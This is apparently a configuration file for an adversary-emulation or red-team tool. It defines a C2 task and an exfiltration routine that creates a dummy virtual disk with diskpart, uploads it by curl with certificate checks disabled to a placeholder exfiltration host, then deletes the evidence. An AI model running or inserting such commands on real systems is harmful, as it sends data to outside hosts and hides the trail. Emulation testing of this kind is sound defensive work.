[exfil_task]
exfil_type = http
exfil_port = 443
tls = True
test_certificate = False
domain_name = None
cert_subj = /C=US/ST=Utah/L=Lehi/O=Your Company, Inc./OU=IT/CN=$HOST

[c2_task]
task_name = c2_http_mm_dd_YYYY_HH_MM
agent_name = 1w2x3y4z

[exfil_actions]
exfil_file = exfil_file.vhd
exfil_file_path = c:\
exfil_file_size = 1000
command_list = echo CREATE VDISK FILE="$EXFIL_FILE_PATH$EXFIL_FILE" MAXIMUM=$EXFIL_FILE_SIZE TYPE=FIXED > $EXFIL_FILE_PATHdiskpart.txt; diskpart /s $EXFIL_FILE_PATHdiskpart.txt; dir $EXFIL_FILE_PATH, c:\Windows\System32\curl.exe -k -F file=@c:\$EXFIL_FILE_PATH$EXFIL_FILE $EXFIL_TYPE$TLS://$EXFIL_HOST:$EXFIL_PORT/p, del $EXFIL_FILE_PATH$EXFIL_FILE; del $EXFIL_FILE_PATHdiskpart.txt